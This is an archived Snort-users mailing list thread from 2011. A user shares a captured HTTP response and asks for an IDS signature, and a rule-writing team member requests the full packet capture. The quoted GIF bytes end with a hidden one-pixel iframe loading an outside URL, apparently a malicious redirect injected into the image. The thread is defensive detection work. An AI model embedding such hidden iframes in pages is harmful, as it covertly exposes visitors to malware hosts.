[Snort-users] iFrame's in gifs

James Lay jlay at ...13475...
Fri Jun 24 21:15:25 EDT 2011


Sending now..thanks Joel.

James

On 6/24/11 6:00 PM, "Joel Esler" <jesler at ...1935...> wrote:

>James, 
>
>We'd love a full pcap so we could eliminate fp's and load test.
>
>Email it to VRT@
>
>Sent from my iPhone
>
>On Jun 24, 2011, at 18:10, "Lay, James" <james.lay at ...15009...> wrote:
>
>> Hey all!
>> 
>> Anyone got any leads on this or a sig for this?  Excitement below..I
>> have full pcap as well as the original image if anyone wants um.
>> 
>> James
>> 
>> Sanitized headers
>> 
>> GET /img/ HTTP/1.1
>> Cookie: <snip>
>> Host: magazine.gem-fashion.com
>> Accept: */*
>> Referer: http://magazine.gem-fashion.com/wearing-jewelry.html
>> Accept-Language: en-us
>> UA-CPU: x86
>> Connection: Keep-Alive
>> 
>> HTTP/1.1 404 Object Not Found
>> Date: Fri, 24 Jun 2011 21:15:39 GMT
>> Server: Apache
>> X-Powered-By: PHP/5.2.11
>> Expires: Thu, 19 Nov 1981 08:52:00 GMT
>> Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
>> pre-check=0
>> Pragma: no-cache
>> Set-Cookie: <snip>; path=/
>> Content-Length: 1221
>> Keep-Alive: timeout=5, max=99
>> Connection: Keep-Alive
>> Content-Type: image/gif
>> 
>> 
>> 
>> GIF87a.............DBD...$"$...dbd.........TRT...424...trt....
>> ....LJL...,*,...ljl.........\Z\...<:<...|z|.........DFD...$&$...dfd.....
>> ....TVT...464...tvt.........LNL...,.,...lnl.........\^\...<><...|~|...,.
>> ............pH,....r.l:...tJ.Z...v..z...x.....%.<>...5;..o. .~..
>> .a
>> .I.a|{0f?..?...z.v.V.!1....#..2.G.a>....B..*.....1...Qa2+`..I..(!K)).B..
>> .....I..H...9P....n%3
>> ....7E...B..-B...
>> JhC..H...G...TaX at ...15318...%. at ...846...!.........l.0.L....3n.r
>> .."%..h.....>........K.R......<l.....`.z.v.......-].\..G.0:.. at ...15319...#?.r.
>> .....\x.."L.7..6M..-..?r.. at ...2568...
>> ..Q]b.......H4.3....&.........^|X.A..s./g........
>> Y.....O...P.)... at ...979...;..r.p..6y....^..;,w.....i...4..p.x..I..E
>> ...).<2
>> .......$...... ^.2.vo....`.(..y...B
>> M<..1
>> ...dm)....y0.~.. ..D...Cs
>> .'B.#LD.w?..A.F.......b.....4d.0.5..`..9%..... at ...15320...
>> .!e.U^.Z..  .. at ...846...@-BP8fy....; ..C.h.&.`..3..D<p.....%.0.0e...&D
>> b.....B..4;.D.r7........P
>> eJ(n.>$......y..I.!....~!Jj^>V..+...BX.....n..p.......2. at ...15321...~
>> ......
>> .!..
>> !p..(|.|.....!A0>......PA..d0d.>.yD......1..B....B.-.x...'.p.H...`.2.$..
>> ..q.\....7D..
>> ..|..e:..`............*3.1..X.!.PA.;.m..H....;<iframe
>> src='http://alaqiq.net/quran/gstata/index.php' width='1' height='1'
>> style='visibility: hidden;'></iframe>
>> 
>> 
>>-------------------------------------------------------------------------
>>-----
>> All the data continuously generated in your IT infrastructure contains
>>a 
>> definitive record of customers, application performance, security
>> threats, fraudulent activity and more. Splunk takes this data and makes
>> sense of it. Business sense. IT sense. Common sense..
>> http://p.sf.net/sfu/splunk-d2d-c1
>> _______________________________________________
>> Snort-users mailing list
>> Snort-users at lists.sourceforge.net
>> Go to this URL to change user options or unsubscribe:
>> https://lists.sourceforge.net/lists/listinfo/snort-users
>> Snort-users list archive:
>> http://www.geocrawler.com/redir-sf.php3?list=snort-users
>> 
>> Please see http://www.snort.org/docs for documentation
>
>--------------------------------------------------------------------------
>----
>All the data continuously generated in your IT infrastructure contains a
>definitive record of customers, application performance, security
>threats, fraudulent activity and more. Splunk takes this data and makes
>sense of it. Business sense. IT sense. Common sense..
>http://p.sf.net/sfu/splunk-d2d-c1
>_______________________________________________
>Snort-users mailing list
>Snort-users at lists.sourceforge.net
>Go to this URL to change user options or unsubscribe:
>https://lists.sourceforge.net/lists/listinfo/snort-users
>Snort-users list archive:
>http://www.geocrawler.com/redir-sf.php3?list=snort-users
>
>Please see http://www.snort.org/docs for documentation






More information about the Snort-users mailing list